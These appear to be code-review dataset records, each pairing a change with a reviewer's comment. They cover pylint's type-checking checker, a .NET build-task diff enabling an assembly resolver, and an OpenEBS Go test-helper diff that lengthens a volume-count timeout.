out-of-order arguments because it is only relevant # for named variables. return # Don't check for ordering if there is an unmatched arg or param arg_set = set(calling_parg_names) | set(calling_kwarg_names) param_set = set(called_param_names) if arg_set != param_set: return # Warn based on the equality of argument ordering if calling_parg_names != called_param_names[: len(calling_parg_names)]: self.add_message("arguments-out-of-order", node=node, args=()) def _check_isinstance_args(self, node): if len(node.args) != 2: # isinstance called with wrong number of args return second_arg = node.args[1] if _is_invalid_isinstance_type(second_arg): self.add_message("isinstance-second-argument-not-valid-type", node=node) # pylint: disable=too-many-branches,too-many-locals @check_messages(*(list(MSGS.keys()))) def visit_call(self, node: nodes.Call) -> None: """check that called functions/methods are inferred to callable objects, and that the arguments passed to the function match the parameters in the inferred function's definition """ called = safe_infer(node.func) self._check_not_callable(node, called) try: called, implicit_args, callable_name = _determine_callable(called) except ValueError: # Any error occurred during determining the function type, most of # those errors are handled by different warnings. return if called.args.args is None: if called.name == "isinstance": # Verify whether second argument of isinstance is a valid type self._check_isinstance_args(node) # Built-in functions have no argument information. return if len(called.argnames()) != len(set(called.argnames())): # Duplicate parameter name (see duplicate-argument). We can't really # make sense of the function call in this case, so just return. return # Build the set of keyword arguments, checking for duplicate keywords, # and count the positional arguments. call_site = astroid.arguments.CallSite.from_call(node) # Warn about duplicated keyword arguments, such as `f=24, **{'f': 24}` for keyword in call_site.duplicated_keywords: self.add_message("repeated-keyword", node=node, args=(keyword,)) if call_site.has_invalid_arguments() or call_site.has_invalid_keywords(): # Can't make sense of this. return # Has the function signature changed in ways we cannot reliably detect? if hasattr(called, "decorators") and decorated_with( called, self.config.signature_mutators ): return num_positional_args = len(call_site.positional_arguments) keyword_args = list(call_site.keyword_arguments.keys()) overload_function = is_overload_stub(called) # Determine if we don't have a context for our call and we use variadics. node_scope = node.scope() if isinstance(node_scope, (nodes.Lambda, nodes.FunctionDef)): has_no_context_positional_variadic = _no_context_variadic_positional( node, node_scope ) has_no_context_keywords_variadic = _no_context_variadic_keywords( node, node_scope ) else: has_no_context_positional_variadic = ( has_no_context_keywords_variadic ) = False # These are coming from the functools.partial implementation in astroid already_filled_positionals = getattr(called, "filled_positionals", 0) already_filled_keywords = getattr(called, "filled_keywords", {}) keyword_args += list(already_filled_keywords) num_positional_args += implicit_args + already_filled_positionals # Analyze the list of formal parameters. args = list(itertools.chain(called.args.posonlyargs or (), called.args.args)) num_mandatory_parameters = len(args) - len(called.args.defaults) parameters: List[List[Any]] = [] parameter_name_to_index = {} for i, arg in enumerate(args): if isinstance(arg, nodes.Tuple): name = None # Don't store any parameter names within the tuple, since those # are not assignable from keyword arguments. else: assert isinstance(arg, nodes.AssignName) # This occurs with: # def f( (a), (b) ): pass name = arg.name parameter_name_to_index[name] = i if i >= num_mandatory_parameters: defval = called.args.defaults[i - num_mandatory_parameters] else: defval = None parameters.append([(name, defval), False]) kwparams = {} for i, arg in enumerate(called.args.kwonlyargs): if isinstance(arg, nodes.Keyword): name = arg.arg else: assert isinstance(arg, nodes.AssignName) name = arg.name kwparams[name] = [called.args.kw_defaults[i], False] self._check_argument_order( node, call_site, called, [p[0][0] for p in parameters] ) # 1. Match the positional arguments. for i in range(num_positional_args): if i < len(parameters): parameters[i][1] = True elif called.args.vararg is not None: # The remaining positional arguments get assigned to the *args # parameter. break elif not overload_function: # Too many positional arguments. self.add_message( "too-many-function-args", node=node, args=(callable_name,) ) break # 2. Match the keyword arguments. for keyword in keyword_args: if keyword in parameter_name_to_index: i = parameter_name_to_index[keyword] if parameters[i][1]: # Duplicate definition of function parameter. # Might be too hardcoded, but this can actually # happen when using str.format and `self` is passed # by keyword argument, as in `.format(self=self)`. # It's perfectly valid to so, so we're just skipping # it if that's the case. if not (keyword == "self" and called.qname() in STR_FORMAT): self.add_message( "redundant-keyword-arg", node=node, args=(keyword, callable_name), ) else: parameters[i][1] = True elif keyword in kwparams: if kwparams[keyword][1]: # Duplicate definition of function parameter. self.add_message( "redundant-keyword-arg", node=node, args=(keyword, callable_name), ) else: kwparams[keyword][1] = True elif called.args.kwarg is not None: # The keyword argument gets assigned to the **kwargs parameter. pass elif isinstance( called, nodes.FunctionDef ) and self._keyword_argument_is_in_all_decorator_returns(called, keyword): pass elif not overload_function: # Unexpected keyword argument. self.add_message( "unexpected-keyword-arg", node=node, args=(keyword, callable_name) ) # 3. Match the **kwargs, if any. if node.kwargs: for i, [(name, defval), assigned] in enumerate(parameters): # Assume that *kwargs provides values for all remaining # unassigned named parameters. if name is not None: parameters[i][1] = True else: # **kwargs can't assign to tuples. pass # Check that any parameters without a default have been assigned # values. for [(name, defval), assigned] in parameters: if (defval is None) and not assigned: display_name = "<tuple>" if name is None else repr(name) if not has_no_context_positional_variadic and not overload_function: self.add_message( "no-value-for-parameter", node=node, args=(display_name, callable_name), ) for name, val in kwparams.items(): defval, assigned = val if ( defval is None and not assigned and not has_no_context_keywords_variadic and not overload_function ): self.add_message("missing-kwoa", node=node, args=(name, callable_name)) @staticmethod def _keyword_argument_is_in_all_decorator_returns( func: nodes.FunctionDef, keyword: str ) -> bool: """Check if the keyword argument exists in all signatures of the return values of all decorators of the function. """ if not func.decorators: return False for decorator in func.decorators.nodes: inferred = safe_infer(decorator) # If we can't infer the decorator we assume it satisfies consumes # the keyword, so we don't raise false positives if not inferred: return True # We only check arguments of function decorators if not isinstance(inferred, nodes.FunctionDef): return False for return_value in inferred.infer_call_result(): # infer_call_result() returns nodes.Const.None for None return values # so this also catches non-returning decorators if not isinstance(return_value, nodes.FunctionDef): return False # If the return value uses a kwarg the keyword will be consumed if return_value.args.kwarg: continue # Check if the keyword is another type of argument if return_value.args.is_argument(keyword): continue return False return True def _check_invalid_sequence_index(self, subscript: nodes.Subscript): # Look for index operations where the parent is a sequence type. # If the types can be determined, only allow indices to be int, # slice or instances with __index__. parent_type = safe_infer(subscript.value) if not isinstance( parent_type, (nodes.ClassDef, astroid.Instance) ) or not has_known_bases(parent_type): return None # Determine what method on the parent this index will use # The parent of this node will be a Subscript, and the parent of that # node determines if the Subscript is a get, set, or delete operation. if subscript.ctx is astroid.Store: methodname = "__setitem__" elif subscript.ctx is astroid.Del: methodname = "__delitem__" else: methodname = "__getitem__" # Check if this instance's __getitem__, __setitem__, or __delitem__, as # appropriate to the statement, is implemented in a builtin sequence # type. This way we catch subclasses of sequence types but skip classes # that override __getitem__ and which may allow non-integer indices. try: methods = astroid.interpreter.dunder_lookup.lookup(parent_type, methodname) if methods is astroid.Uninferable: return None itemmethod = methods[0] except ( astroid.AttributeInferenceError, IndexError, ): return None if ( not isinstance(itemmethod, nodes.FunctionDef) or itemmethod.root().name != "builtins" or not itemmethod.parent or itemmethod.parent.name not in SEQUENCE_TYPES ): return None # For ExtSlice objects coming from visit_extslice, no further # inference is necessary, since if we got this far the ExtSlice # is an error. if isinstance(subscript.value, nodes.ExtSlice): index_type = subscript.value else: index_type = safe_infer(subscript.slice) if index_type is None or index_type is astroid.Uninferable: return None # Constants must be of type int if isinstance(index_type, nodes.Const): if isinstance(index_type.value, int): return None # Instance values must be int, slice, or have an __index__ method elif isinstance(index_type, astroid.Instance): if index_type.pytype() in {"builtins.int", "builtins.slice"}: return None try: index_type.getattr("__index__") return None except astroid.NotFoundError: pass elif isinstance(index_type, nodes.Slice): # A slice can be present # here after inferring the index node, which could # be a `slice(...)` call for instance. return self._check_invalid_slice_index(index_type) # Anything else is an error self.add_message("invalid-sequence-index", node=subscript) return None def _check_not_callable( self, node: nodes.Call, inferred_call: Optional[nodes.NodeNG] ) -> None: """Checks to see if the not-callable message should be emitted Only functions, generators and objects defining __call__ are "callable" We ignore instances of descriptors since astroid cannot properly handle them yet """ # Handle uninferable calls if not inferred_call or inferred_call.callable(): self._check_uninferable_call(node) return if not isinstance(inferred_call, astroid.Instance): self.add_message("not-callable", node=node, args=node.func.as_string()) return # Don't emit if we can't make sure this object is callable. if not has_known_bases(inferred_call): return if inferred_call.parent and isinstance(inferred_call.scope(), nodes.ClassDef): # Ignore descriptor instances if "__get__" in inferred_call.locals: return # NamedTuple instances are callable if inferred_call.qname() == "typing.NamedTuple": return self.add_message("not-callable", node=node, args=node.func.as_string()) @check_messages("invalid-sequence-index") def visit_extslice(self, node: nodes.ExtSlice) -> None: if not node.parent or not hasattr(node.parent, "value"): return None # Check extended slice objects as if they were used as a sequence # index to check if the object being sliced can support them return self._check_invalid_sequence_index(node.parent) def _check_invalid_slice_index(self, node: nodes.Slice) -> None: # Check the type of each part of the slice invalid_slices_nodes: List[nodes.NodeNG] = [] for index in (node.lower, node.upper, node.step): if index is None: continue index_type = safe_infer(index) if index_type is None or index_type is astroid.Uninferable: continue # Constants must be of type int or None if isinstance(index_type, nodes.Const): if isinstance(index_type.value, (int, type(None))): continue # Instance values must be of type int, None or an object # with __index__ elif isinstance(index_type, astroid.Instance): if index_type.pytype() in {"builtins.int", "builtins.NoneType"}: continue try: index_type.getattr("__index__") return except astroid.NotFoundError: pass invalid_slices_nodes.append(index) if not invalid_slices_nodes: return # Anything else is an error, unless the object that is indexed # is a custom object, which knows how to handle this kind of slices parent = node.parent if isinstance(parent, nodes.ExtSlice): parent = parent.parent if isinstance(parent, nodes.Subscript): inferred = safe_infer(parent.value) if inferred is None or inferred is astroid.Uninferable: # Don't know what this is return known_objects = ( nodes.List, nodes.Dict, nodes.Tuple, astroid.objects.FrozenSet, nodes.Set, ) if not isinstance(inferred, known_objects): # Might be an instance that knows how to handle this slice object return for snode in invalid_slices_nodes: self.add_message("invalid-slice-index", node=snode) @check_messages("not-context-manager") def visit_with(self, node: nodes.With) -> None: for ctx_mgr, _ in node.items: context = astroid.context.InferenceContext() inferred = safe_infer(ctx_mgr, context=context) if inferred is None or inferred is astroid.Uninferable: continue if isinstance(inferred, astroid.bases.Generator): # Check if we are dealing with a function decorated # with contextlib.contextmanager. if decorated_with( inferred.parent, self.config.contextmanager_decorators ): continue # If the parent of the generator is not the context manager itself, # that means that it could have been returned from another # function which was the real context manager. # The following approach is more of a hack rather than a real # solution: walk all the inferred statements for the # given *ctx_mgr* and if you find one function scope # which is decorated, consider it to be the real # manager and give up, otherwise emit not-context-manager. # See the test file for not_context_manager for a couple # of self explaining tests. # Retrieve node from all previously visited nodes in the # inference history context_path_names: Iterator[Any] = filter( None, _unflatten(context.path) ) inferred_paths = _flatten_container( safe_infer(path) for path in context_path_names ) for inferred_path in inferred_paths: if not inferred_path: continue scope = inferred_path.scope() if not isinstance(scope, nodes.FunctionDef): continue if decorated_with(scope, self.config.contextmanager_decorators): break else: self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) else: try: inferred.getattr("__enter__") inferred.getattr("__exit__") except astroid.NotFoundError: if isinstance(inferred, astroid.Instance): # If we do not know the bases of this class, # just skip it. if not has_known_bases(inferred): continue # Just ignore mixin classes. if self.config.ignore_mixin_members: if inferred.name[-5:].lower() == "mixin": continue self.add_message( "not-context-manager", node=node, args=(inferred.name,) ) @check_messages("invalid-unary-operand-type") def visit_unaryop(self, node: nodes.UnaryOp) -> None: """Detect TypeErrors for unary operands.""" for error in node.type_errors(): # Let the error customize its output. self.add_message("invalid-unary-operand-type", args=str(error), node=node) @check_messages("unsupported-binary-operation") def visit_binop(self, node: nodes.BinOp) -> None: if node.op == "|": self._detect_unsupported_alternative_union_syntax(node) def _detect_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Detect if unsupported alternative Union syntax (PEP 604) was used.""" if self._py310_plus: # 310+ supports the new syntax return if isinstance( node.parent, TYPE_ANNOTATION_NODES_TYPES ) and not is_postponed_evaluation_enabled(node): # Use in type annotations only allowed if # postponed evaluation is enabled. self._check_unsupported_alternative_union_syntax(node) if isinstance( node.parent, ( nodes.Assign, nodes.Call, nodes.Keyword, nodes.Dict, nodes.Tuple, nodes.Set, nodes.List, nodes.BinOp, ), ): # Check other contexts the syntax might appear, but are invalid. # Make sure to filter context if postponed evaluation is enabled # and parent is allowed node type. allowed_nested_syntax = False if is_postponed_evaluation_enabled(node): parent_node = node.parent while True: if isinstance(parent_node, TYPE_ANNOTATION_NODES_TYPES): allowed_nested_syntax = True break parent_node = parent_node.parent if isinstance(parent_node, nodes.Module): break if not allowed_nested_syntax: self._check_unsupported_alternative_union_syntax(node) def _check_unsupported_alternative_union_syntax(self, node: nodes.BinOp) -> None: """Check if left or right node is of type `type`.""" msg = "unsupported operand type(s) for |" for n in (node.left, node.right): n = astroid.helpers.object_type(n) if isinstance(n, nodes.ClassDef) and is_classdef_type(n): self.add_message("unsupported-binary-operation", args=msg, node=node) break @check_messages("unsupported-binary-operation") def _visit_binop(self, node: nodes.BinOp) -> None: """Detect TypeErrors for binary arithmetic operands.""" self._check_binop_errors(node) @check_messages("unsupported-binary-operation") def _visit_augassign(self, node: nodes.AugAssign) -> None: """Detect TypeErrors for augmented binary arithmetic operands.""" self._check_binop_errors(node) def _check_binop_errors(self, node): for error in node.type_errors(): # Let the error customize its output. if any( isinstance(obj, nodes.ClassDef) and not has_known_bases(obj) for obj in (error.left_type, error.right_type) ): continue self.add_message("unsupported-binary-operation", args=str(error), node=node) def _check_membership_test(self, node): if is_inside_abstract_class(node): return if is_comprehension(node): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not supports_membership_test(inferred): self.add_message( "unsupported-membership-test", args=node.as_string(), node=node ) @check_messages("unsupported-membership-test") def visit_compare(self, node: nodes.Compare) -> None: if len(node.ops) != 1: return op, right = node.ops[0] if op in {"in", "not in"}: self._check_membership_test(right) @check_messages( "unsubscriptable-object", "unsupported-assignment-operation", "unsupported-delete-operation", "unhashable-dict-key", "invalid-sequence-index", "invalid-slice-index", ) def visit_subscript(self, node: nodes.Subscript) -> None: self._check_invalid_sequence_index(node) supported_protocol: Optional[Callable[[Any, Any], bool]] = None if isinstance(node.value, (nodes.ListComp, nodes.DictComp)): return if isinstance(node.value, nodes.Dict): # Assert dict key is hashable inferred = safe_infer(node.slice) if inferred and inferred != astroid.Uninferable: try: hash_fn = next(inferred.igetattr("__hash__")) except astroid.InferenceError: pass else: if getattr(hash_fn, "value", True) is None: self.add_message("unhashable-dict-key", node=node.value) if node.ctx == astroid.Load: supported_protocol = supports_getitem msg = "unsubscriptable-object" elif node.ctx == astroid.Store: supported_protocol = supports_setitem msg = "unsupported-assignment-operation" elif node.ctx == astroid.Del: supported_protocol = supports_delitem msg = "unsupported-delete-operation" if isinstance(node.value, nodes.SetComp): self.add_message(msg, args=node.value.as_string(), node=node.value) return if is_inside_abstract_class(node): return inferred = safe_infer(node.value) if inferred is None or inferred is astroid.Uninferable: return if getattr(inferred, "decorators", None): first_decorator = astroid.helpers.safe_infer(inferred.decorators.nodes[0]) if isinstance(first_decorator, nodes.ClassDef): inferred = first_decorator.instantiate_class() else: return # It would be better to handle function # decorators, but let's start slow. if supported_protocol and not supported_protocol(inferred, node): self.add_message(msg, args=node.value.as_string(), node=node.value) @check_messages("dict-items-missing-iter") def visit_for(self, node: nodes.For) -> None: if not isinstance(node.target, nodes.Tuple): # target is not a tuple return if not len(node.target.elts) == 2: # target is not a tuple of two elements return iterable = node.iter if not isinstance(iterable, nodes.Name): # it's not a bare variable return inferred = safe_infer(iterable) if not inferred: return if not isinstance(inferred, nodes.Dict): # the iterable is not a dict return if all(isinstance(i[0], nodes.Tuple) for i in inferred.items): # if all keys are tuples return self.add_message("dict-iter-missing-items", node=node) class IterableChecker(BaseChecker): """Checks for non-iterables used in an iterable context. Contexts include: - for-statement - starargs in function call - `yield from`-statement - list, dict and set comprehensions - generator expressions Also checks for non-mappings in function call kwargs. """ __implements__ = (IAstroidChecker,) name = "typecheck" msgs = { "E1133": ( "Non-iterable value %s is used in an iterating context", "not-an-iterable", "Used when a non-iterable value is used in place where " "iterable is expected", ), "E1134": ( "Non-mapping value %s is used in a mapping context", "not-a-mapping", "Used when a non-mapping value is used in place where " "mapping is expected", ), } @staticmethod def _is_asyncio_coroutine(node): if not isinstance(node, nodes.Call): return False inferred_func = safe_infer(node.func) if not isinstance(inferred_func, nodes.FunctionDef): return False if not inferred_func.decorators: return False for decorator in inferred_func.decorators.nodes: inferred_decorator = safe_infer(decorator) if not isinstance(inferred_decorator, nodes.FunctionDef): continue if inferred_decorator.qname() != ASYNCIO_COROUTINE: continue return True return False def _check_iterable(self, node, check_async=False): if is_inside_abstract_class(node) or is_comprehension(node): return inferred = safe_infer(node) if not inferred: return if not is_iterable(inferred, check_async=check_async): self.add_message("not-an-iterable", args=node.as_string(), node=node) def _check_mapping(self, node): if is_inside_abstract_class(node): return if isinstance(node, nodes.DictComp): return inferred = safe_infer(node) if inferred is None or inferred is astroid.Uninferable: return if not is_mapping(inferred): self.add_message("not-a-mapping", args=node.as_string(), node=node) @check_messages("not-an-iterable") def visit_for(self, node: nodes.For) -> None: self._check_iterable(node.iter) @check_messages("not-an-iterable") def visit_asyncfor(self, node: nodes.AsyncFor) -> None: self._check_iterable(node.iter, check_async=True) @check_messages("not-an-iterable") def visit_yieldfrom(self, node: nodes.YieldFrom) -> None: if self._is_asyncio_coroutine(node.value): return self._check_iterable(node.value) @check_messages("not-an-iterable", "not-a-mapping") def visit_call(self, node: nodes.Call) -> None: for stararg in node.starargs: self._check_iterable(stararg.value) for kwarg in node.kwargs: self._check_mapping(kwarg.value) @check_messages("not-an-iterable") def visit_listcomp(self, node: nodes.ListComp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_dictcomp(self, node: nodes.DictComp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_setcomp(self, node: nodes.SetComp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("not-an-iterable") def visit_generatorexp(self, node: nodes.GeneratorExp) -> None: for gen in node.generators: self._check_iterable(gen.iter, check_async=gen.is_async) @check_messages("await-outside-async") def visit_await(self, node: nodes.Await) -> None: self._check_await_outside_coroutine(node) def _check_await_outside_coroutine(self, node: nodes.Await) -> None: node_scope = node.scope() while not isinstance(node_scope, nodes.Module): if isinstance(node_scope, nodes.AsyncFunctionDef): return if isinstance(node_scope, nodes.FunctionDef): break node_scope = node_scope.parent.scope() self.add_message("await-outside-async", node=node) def register(linter: "PyLinter") -> None: linter.register_checker(TypeChecker(linter)) linter.register_checker(IterableChecker(linter))
1
20,331
Not sure if we need this. It's not tested because it only guards against a new conditional definition of a dunder method in a built-in package. I am fine with leaving it out.
PyCQA-pylint
py
@@ -0,0 +1,16 @@ +// Licensed to the .NET Foundation under one or more agreements. +// The .NET Foundation licenses this file to you under the MIT license. +// See the LICENSE file in the project root for more information. + +using Microsoft.DotNet.Build.Common.Desktop; + +namespace Microsoft.DotNet.Build.Tasks.Feed +{ + public partial class PushToBlobFeed + { + static PushToBlobFeed() + { + AssemblyResolver.Enable(); + } + } +}
1
1
14,575
Is this the only task in this library? If so this is good, if not then we should do it for each task.
dotnet-buildtools
.cs
@@ -245,7 +245,7 @@ func (ops *Operations) GetCstorVolumeCountEventually(namespace, lselector string cvCount := ops.GetCVCount(namespace, lselector) return cvCount }, - 60, 10).Should(Equal(expectedCVCount)) + 120, 10).Should(Equal(expectedCVCount)) } // GetCstorVolumeReplicaCountEventually gives the count of cstorvolume based on
1
/* Copyright 2019 The OpenEBS Authors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package tests import ( "bytes" "fmt" "time" . "github.com/onsi/ginkgo" . "github.com/onsi/gomega" apis "github.com/openebs/maya/pkg/apis/openebs.io/v1alpha1" bd "github.com/openebs/maya/pkg/blockdevice/v1alpha2" csp "github.com/openebs/maya/pkg/cstorpool/v1alpha3" cv "github.com/openebs/maya/pkg/cstorvolume/v1alpha1" cvr "github.com/openebs/maya/pkg/cstorvolumereplica/v1alpha1" errors "github.com/openebs/maya/pkg/errors/v1alpha1" kubeclient "github.com/openebs/maya/pkg/kubernetes/client/v1alpha1" deploy "github.com/openebs/maya/pkg/kubernetes/deployment/appsv1/v1alpha1" ns "github.com/openebs/maya/pkg/kubernetes/namespace/v1alpha1" pvc "github.com/openebs/maya/pkg/kubernetes/persistentvolumeclaim/v1alpha1" pod "github.com/openebs/maya/pkg/kubernetes/pod/v1alpha1" svc "github.com/openebs/maya/pkg/kubernetes/service/v1alpha1" snap "github.com/openebs/maya/pkg/kubernetes/snapshot/v1alpha1" sc "github.com/openebs/maya/pkg/kubernetes/storageclass/v1alpha1" spc "github.com/openebs/maya/pkg/storagepoolclaim/v1alpha1" templatefuncs "github.com/openebs/maya/pkg/templatefuncs/v1alpha1" unstruct "github.com/openebs/maya/pkg/unstruct/v1alpha2" result "github.com/openebs/maya/pkg/upgrade/result/v1alpha1" "github.com/openebs/maya/tests/artifacts" corev1 "k8s.io/api/core/v1" k8serrors "k8s.io/apimachinery/pkg/api/errors" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/client-go/kubernetes/scheme" "k8s.io/client-go/tools/remotecommand" ) const ( maxRetry = 30 ) // Options holds the args used for exec'ing into the pod type Options struct { podName string container string namespace string cmd []string } // Operations provides clients amd methods to perform operations type Operations struct { KubeClient *kubeclient.Client PodClient *pod.KubeClient SCClient *sc.Kubeclient PVCClient *pvc.Kubeclient NSClient *ns.Kubeclient SnapClient *snap.Kubeclient CSPClient *csp.Kubeclient SPCClient *spc.Kubeclient SVCClient *svc.Kubeclient CVClient *cv.Kubeclient CVRClient *cvr.Kubeclient URClient *result.Kubeclient UnstructClient *unstruct.Kubeclient DeployClient *deploy.Kubeclient BDClient *bd.Kubeclient kubeConfigPath string } // OperationsOptions abstracts creating an // instance of operations type OperationsOptions func(*Operations) // WithKubeConfigPath sets the kubeConfig path // against operations instance func WithKubeConfigPath(path string) OperationsOptions { return func(ops *Operations) { ops.kubeConfigPath = path } } // NewOperations returns a new instance of kubeclient meant for // cstor volume replica operations func NewOperations(opts ...OperationsOptions) *Operations { ops := &Operations{} for _, o := range opts { o(ops) } ops.withDefaults() return ops } // NewOptions returns the new instance of Options func NewOptions() *Options { return new(Options) } // WithPodName fills the podName field in Options struct func (o *Options) WithPodName(name string) *Options { o.podName = name return o } // WithNamespace fills the namespace field in Options struct func (o *Options) WithNamespace(ns string) *Options { o.namespace = ns return o } // WithContainer fills the container field in Options struct func (o *Options) WithContainer(container string) *Options { o.container = container return o } // WithCommand fills the cmd field in Options struct func (o *Options) WithCommand(cmd ...string) *Options { o.cmd = cmd return o } // withDefaults sets the default options // of operations instance func (ops *Operations) withDefaults() { var err error if ops.KubeClient == nil { ops.KubeClient = kubeclient.New(kubeclient.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.NSClient == nil { ops.NSClient = ns.NewKubeClient(ns.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.SCClient == nil { ops.SCClient = sc.NewKubeClient(sc.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.PodClient == nil { ops.PodClient = pod.NewKubeClient(pod.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.PVCClient == nil { ops.PVCClient = pvc.NewKubeClient(pvc.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.SnapClient == nil { ops.SnapClient = snap.NewKubeClient(snap.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.SPCClient == nil { ops.SPCClient = spc.NewKubeClient(spc.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.CSPClient == nil { ops.CSPClient, err = csp.KubeClient().WithKubeConfigPath(ops.kubeConfigPath) Expect(err).To(BeNil(), "while initilizing csp client") } if ops.CVClient == nil { ops.CVClient = cv.NewKubeclient(cv.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.CVRClient == nil { ops.CVRClient = cvr.NewKubeclient(cvr.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.URClient == nil { ops.URClient = result.NewKubeClient(result.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.UnstructClient == nil { ops.UnstructClient = unstruct.NewKubeClient(unstruct.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.DeployClient == nil { ops.DeployClient = deploy.NewKubeClient(deploy.WithKubeConfigPath(ops.kubeConfigPath)) } if ops.BDClient == nil { ops.BDClient = bd.NewKubeClient(bd.WithKubeConfigPath(ops.kubeConfigPath)) } } // VerifyOpenebs verify running state of required openebs control plane components func (ops *Operations) VerifyOpenebs(expectedPodCount int) *Operations { By("waiting for maya-apiserver pod to come into running state") podCount := ops.GetPodRunningCountEventually( string(artifacts.OpenebsNamespace), string(artifacts.MayaAPIServerLabelSelector), expectedPodCount, ) Expect(podCount).To(Equal(expectedPodCount)) By("waiting for openebs-provisioner pod to come into running state") podCount = ops.GetPodRunningCountEventually( string(artifacts.OpenebsNamespace), string(artifacts.OpenEBSProvisionerLabelSelector), expectedPodCount, ) Expect(podCount).To(Equal(expectedPodCount)) By("Verifying 'admission-server' pod status as running") _ = ops.GetPodRunningCountEventually(string(artifacts.OpenebsNamespace), string(artifacts.OpenEBSAdmissionServerLabelSelector), expectedPodCount, ) Expect(podCount).To(Equal(expectedPodCount)) return ops } // GetPodRunningCountEventually gives the number of pods running eventually func (ops *Operations) GetPodRunningCountEventually(namespace, lselector string, expectedPodCount int) int { var podCount int for i := 0; i < maxRetry; i++ { podCount = ops.GetPodRunningCount(namespace, lselector) if podCount == expectedPodCount { return podCount } time.Sleep(5 * time.Second) } return podCount } // GetCstorVolumeCount gives the count of cstorvolume based on // selecter func (ops *Operations) GetCstorVolumeCount(namespace, lselector string, expectedCVCount int) int { var cvCount int for i := 0; i < maxRetry; i++ { cvCount = ops.GetCVCount(namespace, lselector) if cvCount == expectedCVCount { return cvCount } time.Sleep(5 * time.Second) } return cvCount } // GetCstorVolumeCountEventually gives the count of cstorvolume based on // selecter eventually func (ops *Operations) GetCstorVolumeCountEventually(namespace, lselector string, expectedCVCount int) bool { return Eventually(func() int { cvCount := ops.GetCVCount(namespace, lselector) return cvCount }, 60, 10).Should(Equal(expectedCVCount)) } // GetCstorVolumeReplicaCountEventually gives the count of cstorvolume based on // selecter eventually func (ops *Operations) GetCstorVolumeReplicaCountEventually(namespace, lselector string, expectedCVRCount int) bool { return Eventually(func() int { cvCount := ops.GetCstorVolumeReplicaCount(namespace, lselector) return cvCount }, 60, 10).Should(Equal(expectedCVRCount)) } // GetPodRunningCount gives number of pods running currently func (ops *Operations) GetPodRunningCount(namespace, lselector string) int { pods, err := ops.PodClient. WithNamespace(namespace). List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return pod. ListBuilderForAPIList(pods). WithFilter(pod.IsRunning()). List(). Len() } // GetCVCount gives cstorvolume healthy count currently based on selecter func (ops *Operations) GetCVCount(namespace, lselector string) int { cvs, err := ops.CVClient. List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return cv. NewListBuilder(). WithAPIList(cvs). WithFilter(cv.IsHealthy()). List(). Len() } // GetCstorVolumeReplicaCount gives cstorvolumereplica healthy count currently based on selecter func (ops *Operations) GetCstorVolumeReplicaCount(namespace, lselector string) int { cvrs, err := ops.CVRClient. List(metav1.ListOptions{LabelSelector: lselector}) Expect(err).ShouldNot(HaveOccurred()) return cvr. ListBuilder(). WithAPIList(cvrs). WithFilter(cvr.IsHealthy()). List(). Len() } // IsPVCBound checks if the pvc is bound or not func (ops *Operations) IsPVCBound(pvcName string) bool { volume, err := ops.PVCClient. Get(pvcName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return pvc.NewForAPIObject(volume).IsBound() } // IsPVCBoundEventually checks if the pvc is bound or not eventually func (ops *Operations) IsPVCBoundEventually(pvcName string) bool { return Eventually(func() bool { volume, err := ops.PVCClient. Get(pvcName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return pvc.NewForAPIObject(volume).IsBound() }, 60, 10). Should(BeTrue()) } // IsPodRunningEventually checks if the pvc is bound or not eventually func (ops *Operations) IsPodRunningEventually(namespace, podName string) bool { return Eventually(func() bool { p, err := ops.PodClient. WithNamespace(namespace). Get(podName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) return pod.NewForAPIObject(p). IsRunning() }, 150, 10). Should(BeTrue()) } // GetSnapshotTypeEventually returns type of snapshot eventually func (ops *Operations) GetSnapshotTypeEventually(snapName string) string { var snaptype string for i := 0; i < maxRetry; i++ { snaptype = ops.GetSnapshotType(snapName) if snaptype == "Ready" { return snaptype } time.Sleep(5 * time.Second) } return snaptype } // GetSnapshotType returns type of snapshot currently func (ops *Operations) GetSnapshotType(snapName string) string { snap, err := ops.SnapClient. Get(snapName, metav1.GetOptions{}) Expect(err).ShouldNot(HaveOccurred()) if len(snap.Status.Conditions) > 0 { return string(snap.Status.Conditions[0].Type) } return "NotReady" } // IsSnapshotDeleted checks if the snapshot is deleted or not func (ops *Operations) IsSnapshotDeleted(snapName string) bool { for i := 0; i < maxRetry; i++ { _, err := ops.SnapClient. Get(snapName, metav1.GetOptions{}) if err != nil { return isNotFound(err) } time.Sleep(5 * time.Second) } return false } // IsPVCDeleted tries to get the deleted pvc // and returns true if pvc is not found // else returns false func (ops *Operations) IsPVCDeleted(pvcName string) bool { _, err := ops.PVCClient. Get(pvcName, metav1.GetOptions{}) if isNotFound(err) { return true } return false } // IsPodDeletedEventually checks if the pod is deleted or not eventually func (ops *Operations) IsPodDeletedEventually(namespace, podName string) bool { return Eventually(func() bool { _, err := ops.PodClient. WithNamespace(namespace). Get(podName, 